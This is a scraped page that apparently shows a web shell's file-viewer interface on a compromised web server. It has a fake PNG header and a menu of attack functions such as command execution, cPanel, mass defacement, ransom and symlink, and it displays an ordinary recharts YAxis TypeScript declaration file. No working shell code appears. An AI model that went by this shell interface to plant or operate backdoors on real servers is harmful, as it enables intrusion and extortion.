\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/transfersh/SecureShareMail/node_modules/recharts/types/cartesian/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/transfersh/SecureShareMail/node_modules/recharts/types/cartesian/YAxis.d.ts |
/**
* @fileOverview Y Axis
*/
import * as React from 'react';
import { BaseAxisProps, AxisInterval, PresentationAttributesAdaptChildEvent } from '../util/types';
interface YAxisProps extends BaseAxisProps {
/** The unique id of y-axis */
yAxisId?: string | number;
/**
* Ticks can be any type when the axis is the type of category
* Ticks must be numbers when the axis is the type of number
*/
ticks?: (string | number)[];
/** The width of axis, which need to be set by the user */
width?: number;
/** The height of axis which is usually calculated in Chart */
height?: number;
mirror?: boolean;
/** The orientation of axis */
orientation?: 'left' | 'right';
padding?: {
top?: number;
bottom?: number;
};
minTickGap?: number;
interval?: AxisInterval;
reversed?: boolean;
tickMargin?: number;
}
export type Props = Omit<PresentationAttributesAdaptChildEvent<any, SVGElement>, 'scale' | 'ref'> & YAxisProps;
export declare class YAxis extends React.Component<Props> {
static displayName: string;
static defaultProps: {
allowDuplicatedCategory: boolean;
allowDecimals: boolean;
hide: boolean;
orientation: string;
width: number;
height: number;
mirror: boolean;
yAxisId: number;
tickCount: number;
type: string;
padding: {
top: number;
bottom: number;
};
allowDataOverflow: boolean;
scale: string;
reversed: boolean;
};
render(): React.JSX.Element;
}
export {};